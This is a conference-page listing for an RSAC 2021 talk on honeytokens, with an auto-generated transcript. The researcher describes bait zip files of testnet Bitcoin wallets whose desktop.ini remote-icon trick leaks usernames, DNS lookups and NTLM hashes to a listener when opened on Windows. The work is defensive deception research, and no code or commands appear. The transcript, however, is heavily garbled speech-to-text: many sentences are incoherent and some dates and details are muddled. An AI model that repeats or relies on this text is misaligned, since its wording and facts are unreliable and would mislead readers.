Events Add an event Speakers Talks Collections
 
Duration 40:01
16+
Play
Video

Who Stole My 100,000 Dollars’ Worth Bitcoin Wallets - Story of HoneyTokens

Tan Kean Siong
Security Researcher at Honeynet Project
  • Video
  • Table of contents
  • Video
RSAC 2021
May 20, 2021, Online, USA
RSAC 2021
Request Q&A
RSAC 2021
From the conference
RSAC 2021
Request Q&A
Video
Who Stole My 100,000 Dollars’ Worth Bitcoin Wallets - Story of HoneyTokens
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Add to favorites
51
I like 0
I dislike 0
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
  • Description
  • Transcript
  • Discussion

About speaker

Tan Kean Siong
Security Researcher at Honeynet Project

Tan Kean Siong, Security Researcher, Independent Is it possible to easily create a 'tailor-made' deceptive file, let it get stolen on the Internet, and then notify the creator with the 'thief' details? This session will showcase a 90-day real-world use case that did exactly that, spreading '$100,000 worth' of bitcoin wallets on the Internet where all wallets were stolen. Interesting observations, an open source tool, and lessons learned will be shared.

View the profile

About the talk

Tan Kean Siong, Security Researcher, Independent Is it possible to easily create a 'tailor-made' deceptive file, let it get stolen on the Internet, and then notify the creator with the 'thief' details? This session will showcase a 90-day real-world use case that did exactly that, spreading '$100,000 worth' of bitcoin wallets on the Internet where all wallets were stolen. Interesting observations, an open source tool, and lessons learned will be shared.

Share

A good day everybody. This is Ken. Thank you very much for listening to mine. Bitcoin. Wallet story. Well, honey, I project, so during my free time. I bought him sort of Honeypot to development and play around with a different deceptive base defense, mechanism. Well, personally always have had this big questions in my mind. What if you, and I just leave it there before, 90 days or 60 days, what will happen to our concept for what we are going to explode today, who

stole my heart, a thousand dollars worth of a Bitcoin wallet. Well, that's about all this story of the honey tokens for the next 30 to 35 minutes. Will shout out three things right here. So first, let's take a quick look about the tools honey back. This is a new open sore sore throats every developed for the for this purpose. Only. All these kind of $100,000 worth of a Bitcoin wallet and then how it plays it on the internet and in an exciting woman that we have about this use case.

Last but not least. I would love to share with everyone and I hear about some of the learning experience, some to do. And don'ts, let's do this together, but definitely feel free to ask any questions. I would definitely, love to answer your questions and Let's do this together. No, no, they serving already know that a loss of a security company perform internet while scanning in order to look for in security advisers or do is kill coffee cup system or service on the internet,

big brain behind the scenes. Always thought I had a thought. How can we secure it nicely? Well, just on the other side of Internet goes, bad guy. They are looking at the same so-called internet scanning result. And those guys are the hobbits. Those kind of result result with the medicines in time. For example. Looking for a secure server. We shall content cons of credit card, personal information only, you could be looking for some internal service which belongs to

a certain company and all this kind of information can be Library. Weather in order to infiltrate into the corporate environment into a private server farm and some sort of stopped. Well, bad guy are looking for juicy information. On the internet will always love to Heidi's to secure the real life, a senior price on Bow Street teeth and they tried to break into a new house. You carry an empty back to the house and then they will put all of the jewelry's, all the gold and

silver into the back. Carry the food back out from crime scene now. What do you say in the last movie in the GPS tracker devices in the back wall in the back from a single locations to another locations. The GPS tracker will send sudden ping or sudden signal back to the controller also called an investigator is, can you see? I used to kind of keep trying about where the falls on going and where is Superior here. And there, I would love to try this scenario, this animals you to, so call the cyber-security

Defenders point of view. It's always something that if anything, that we can do in this case, in terms of cyber Defenders point of view. What is a picture of big falls into discount bag and wherever the fall get stolen over the Internet informations afterwards? His concept is not brand. New. This is about hunting is about bait is about brick from the nautical terms of which popular in the industry. Right now. You will still come back to the same fundamental concept which is about a bit

about a real-life example. We shove back in 2017. I came across every piece of public block. We should posed by the guru's mr. Stevens on sunblock in 2017. He observe this very interesting observations someone cuz I was the bad guy died in 2017 and 2017, bitcoin price was all time. High was back. Then I need a bitcoin price was around $19,000 or a coin in 2017, on some of the internet scanning activities. People try to pick pocketer Bitcoin wallet from his a web server and this apparent, it came back from time to time. I'll look up a few months.

One thing I really catch all attention is the picture that she posted on the Block. This is a vegetable or personally, I would love to say that this is a very beautiful and very sexy Webster below by continuously. Cheating on Teresa West Sabella. Please try to try to try his luck by guessing those kind of correct wallet. Crypto wallet found in the hope that there's some crypto wallet located on this a web server IP address. The second columns will be the date and the time stand by to get

ready for the hitch beer and responds over here, will be seeing a lot of a HTTP 404 not found response and I followed by the data size and the user agent. Some guy just called you to try his luck. Try to book forcing or guessing differently. Coin wallet found in this case. Of course, he was hit with a loss of 40404, not found history error code. There was no any Bitcoin wallet over there. Well, the things that catch our attention the most. Is the patterns of the brute-forcing activities or

pattern of the Bride guessing those camper crypto wallet found in contacts for common. Common. Common practice. In this case, that guy try to look for a zip file, which contains the critical role in this case. They're looking for phone and call for backup /. One of those. Anything that we can do right here. Can we try to feed the bad guy with the data that Danny and content in it? And eventually this data that are a size by the bad guy and he will send us all sitting formations about the bad guy.

Behind the scene, saw the phone. So call it a concept for us. We would like to introduce you to a new open-source to Honey Bear. Arabic is a to wish allow which helped all of us at the crib or we can easily and better if any such a small photos into it. If someone else says it will notify you and me back. Let's worry about the notifications for the bed or sitting quietly over there. If someone intentionally set it will notify us for our security Committee in cyber security defense point of view, and we hope that this can be useful for Madeira Beach, detections deceptive,

defense mechanism. Let's take a quick look together about how high back works. Easiest way, honey. Back spell contain three. Different components will be pretty easy to, to use in this case. So, the first component will be this, a honey-baked ham online client, which you have seen on the screen right now. Or the second components will be the high basketball DNS server setup responder in order to work to get a refund back to component can work. Well in each other's that eventually decide to give us a

good result. We can easily generate a baby fall with anybody files and photos into a sample answer PDF. Call documents. I'll text Paula pictures or anything seem to the default and honey. Back clients will generate soccer finals. You fall for it. Now. I'll let a sheep. Give it a try to take a look about the finals. You thought, how to find out if a house looks like. That was asked to sing on the right screen right here. I was, his phone is still a simple treeview about one of those. You felt that we generated

you falling in the secret. Secret folder and then it's just a single for the following is a super secret document. I know we have a lot of speaker right here during the process will automatically slot, two different new phone into the Secret Door under the secret folder or the first filed will be the fall and up people that's always mentions. You are El II. Soul will be the false before the name desktop.ini. Adding mechanism for a honey badger. And this is how someone tried to access. The file is, loading mechanism will

be kicking it. For the first half hour, which is the desktop of iron that is one of the clerical means, follow that. Every one of us will be encounter in Windows operating system inside in a legitimate usage or is associated with how windows display the folders are on the window or aisle, for example, for a photo, if you want to customize the icon for the photos, we can you do it in the with this other stuff. And I will try to look for the icon found on a local system. Credits to Kingston, can reopen a very interesting

timing. Desktop icon for locally-owned tree, did this mechanism to that? I'm looking for icon on the external location to be so I can file that sitting on a certain domain. I'm located somewhere with some IP address on Summit. Now, off the internet with these kind of chicken, if I guess it's really handy for the mechanism. In this case, the second phone that has a similar mechanism, the icons. I'll try to look for the icon Beach. Exact volleyball on XM

locations, the IP address of sitting somewhere. We have these secret Zoo fall on hand and one place it somewhere on Saint a computer networks internet. Daddy's follow the secret has. He found now? He try to unzip deceitful and click into the photo. What will happen is? It is honey back, the zufall retrica two of them. The first responder. We shall we set up can we can set it up on which hotel on a 7 IP address on the internet for the units of a component

on a Dennis traffic's been logging. We've just simply on the icicle light. On this case. We will start to collect some information such as the computer name. The username, the domain name from The Business Machines, which used to assess are used to On Demand open hours. Belt for the responder perspective as the username computer name. And if we're lucky, we were able to get some empty RMB to a fascist or Indian hatchet. In this case. Is it going to be a

small piece of information here and there but eventually all of this information together and it comes from a very beautiful and very useful investigations picture for August. Call Kevin right here. I'll pick up all four Windows operating system as well. Now. Well, if someone tried again, able to get a stroke and she opened it and I sent it in. Linux, OS X r o s. S o n Garmin, we will not able to receive any alerts for. Now. We are always looking for new ideas, new techniques, which we can apply

building mechanism for Linux and OS X machines. So, if you came across, if any of these are interesting times on new, I do feel free to reach out to us. We would like to hear about this and hopefully we can implement this in the handbag and four digits of Open Source 2. We can be useful for our community and especially in terms of the cybersecurity. I'm inside the Defenders point of view. I know things are getting interesting things. We have the Z's pieces before right. Now on hand. I would say that this thing is not really

a brand new number cell phone blocked or before honey. Bear. One of our highlight is this is an open-source to you can easily generate a Zippo with any photos or any and better thousand photos ass feel. I so we can just have single file your phone or three thousand of your phone. Since I just, I don't scream so I can easily integrated Auto scripting language of Hong Min in our system. I'll have these tools on how I had right now. The next question will be, how can you play and get us all

something about discussions occur in create a discount? So what if I, if he plays $100,000 worth of a Bitcoin wallet and we just leave it there on the internet for 90 days. What what will happen to all Den? Well, once we had this idea, I came across a very huge Roblox. Are presently. I don't have $100,000 worth of bitcoin wallet on my hand. Be kind to me. Thank you very much. And I Von well. Alter be sitting around. And then we came across some of these are very

interesting alternative, mainly be calling testament, which is a PTC. If we could find 10 Bitcoin wallet and unprotected, and they contain contain 1btc Testament. In this case. Now, some differences between BTC Testament and BCC, which is Bitcoin. BTC attachment for testing purposes is very strange developers or applications, and using the same mechanism in the back. Oh, well, BTC test. And it doesn't associate with any real value to any currency value while becoming so, is associated to the currencies such as the US dollar. In this

case. But we are looking at the addresses, the beaches attachment and BTC addresses prefix with a so-called different prefix. Soprano, Fishel, addresses, in applications open if we can get it freely from different salsa, but you can go for the same approach. I would threaten such as that. Once we finish use it for a different use cases, please, I'll transfer it back to the faucet. So, out of the calipers or other members of anyone in the community can use it later.

During the time 1 BBC, one Bitcoin will be equivalent to US 10 u.s. Dollar. I want to bring up Lisa human this border at the terms in human psychology perspective. Interesting is a placeholder for Bello such as cash credit card or identification cards, which are clear which will be appearing in the wallet in real life. What if someone eats in a restaurant. What was someone take it? And try to contact the owner or we'll just what some of this Thicket and

take all the cash. So what is a relief or 10 became wallet on the internet? What will happen? So we decided to put all this time, the carnival. Multiple open directory service, web servers on the internet, sitting quietly. Over. We just wanted to wait for things to happen, but looks real. Sorry, for the loss of many personal, fouls on the rest of the bunch of documents what we really expect. Is a full screen of, very sexy and very beautiful. Now, web server law and really expected a different

doctors or different tractors or different bad guy. Try to fight with each other off, or I will be going with a different copy of our becoming wallet from a web server expectations. Well, in reality in reality is so disappointing. Oh, absolutely. Just simply quiet for the first 30 days or 35 days from time to time. We have seen some cats and flies in and say hi. If you're lucky enough vegetables that we do. So first lesson learned, just be patient reset. A different approach about, how can we improve it? So we decided to go for more

proactive approach as we try to put some information such as this is a secret. Please don't please don't download. Please don't tolerate things are getting interesting because people are starting to and overall what happened in. Interesting to see all candy, corn was created with a honey badger or a zip file was stolen nine of the 10. Because I was so sudden informations about a bad guy behind the scene and we have one missing, Lex Mac OSS environment. So

we have never received any things back, and he has the fastest record for one of the stolen wallet is almost the last an immediate. After we post it on my page, being a Scooby-Doo 2. Could be a human's behind people. Who knows. All for the next 5 minutes or 10 minutes interview about 1. And I expect the same way about someone totally Wipe Out. The whole story started around March 23rd, last year, and replace it. He also said a lesson 24 hours, surprisingly and unexpectedly, become totally empty. Some

Zero Ice Cream right now. Somebody just a quiet about our BTC. I spent bullet. Hey, buddy. This is a test. There's no value in to it. Why are you wipe out our entire a letter to take a quick look about a tree different component right here, so we can form a nice on timeline investigation. Can I do better? I am March 2024. We someone assess our best of a and retrieve the ball fall from odesza. This case will be, he got to fall from a few coins to be calling. One of those two hundred on this case is

indicate a success and dollar follow by the musician for Firefox, 70. For this things happen in a 1440 UTC. 2 minutes afterwards. We received this a DNS request, a pretty long DNS request. We should appear on the screen right here is DNS request is the formulas office. Crafted for all of us. And then the First Column will be the value, which is almost username or the Windows operating system. We should reschedule. Mr. Blue. Second column will be named. In this case will be the desktop a fmm be 6K.

So once you get easa, DNS request, this indicates that the bad guy. Was Angela going to click into the secret folder in Windows, Explorer, windows machines. Now things are getting interesting because of the whole, it looks at continuity of care for 20 minutes. We realized I hate the folks is try to look into a crypto wallet for 20 minutes time. Put a tooth component. This is about the responder perspective. Well, we collected our so-called ntombi. The username is the blue is a chocolate pie with what I have seen on the DNS log just now, and I can be the name appear to be the same as long as

can be useful for the southern later. An overall and a timeline investigation timeline was around 1440. UTC wallet was stolen from a web server afterward. We received the first DNS indicates that the law 35 minutes from the first moment. I will advise your phone. Got stolen mr. Blue Wipeout. And right now I have no idea why she did this. It could be, I guess could be found what we did and he just pissed off about what we have done right here. I'm just joking

do all these have evidence together eventually investigations timeline or pictures. I want to shine, very beautiful and very sexy Webster the law. We hope that the folks back, I will try to find themselves and try to grab a copy of the Bitcoin. Willis friend from Alexa inside. We had to wait for more than 35 30 days to get. The first result is always the pain and the fun fall hype over such as cybersecurity research, is always thicker, take time, and we can have us a good result. I will suggest that customize your

own unique deceptive bait, always have all these bait. The more you think it is. My belief that the impact will be back to the definitely a lot of subjects that we should put up the boarding Banner in this case or warning message. Hey, buddy. This is a restricted area. Restricted resources. You are not authorized to assess it. Why would someone try to bypass or ignore? Totally about these kind of warning message things can be getting interesting? one, last thing

I wasn't mentioned right here is Never underestimate a cement for a great impact of these for us. Initially that he saw this man to be more available for Windows operating system. Well, surprisingly nine out of ten of Bitcoin wallet, return setting informations about a bad guy behind us. And I definitely never underestimate about a great impact, all of it. The more unique it is that this can be really useful. You've a lot to give you a try and please feel free to try on our money back into a tools that will help you to create a big zip file on. IPhone can easily

about any photo of falls into a new Su notify you. If I want to see the GitHub pages to download and it says it also would like to welcome anyone, like to contribute to these new techniques, Garland. Please show me bus for today's session. I would love to thank us for this wonderful me to shy about first to Shobha. I want you to choose right here, and thanks for listening to my Bitcoin wallet story. Thank you very much.

Cackle comments for the website

Buy this talk

Access to the talk “Who Stole My 100,000 Dollars’ Worth Bitcoin Wallets - Story of HoneyTokens”
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free

Ticket

Get access to all videos “RSAC 2021”
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Ticket

Similar talks

Tim Bandos
VP at Digital Guardian
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Bill Hill
CISO at The MITRE Corporation
+ 1 speaker
Stanley Barr
Senior principal cyber deception researcher at MITRE corp
+ 1 speaker
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Brook Chelmo
Software and Security Product Marketing Strategist at SonicWall Inc.
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free

Buy this video

Video

Access to the talk “Who Stole My 100,000 Dollars’ Worth Bitcoin Wallets - Story of HoneyTokens”
Available
In cart
Free
Free
Free
Free
Free
Free
Free
Free

Conference Cast

With ConferenceCast.tv, you get access to our library of the world's best conference talks.

Conference Cast
816 conferences
32658 speakers
12329 hours of content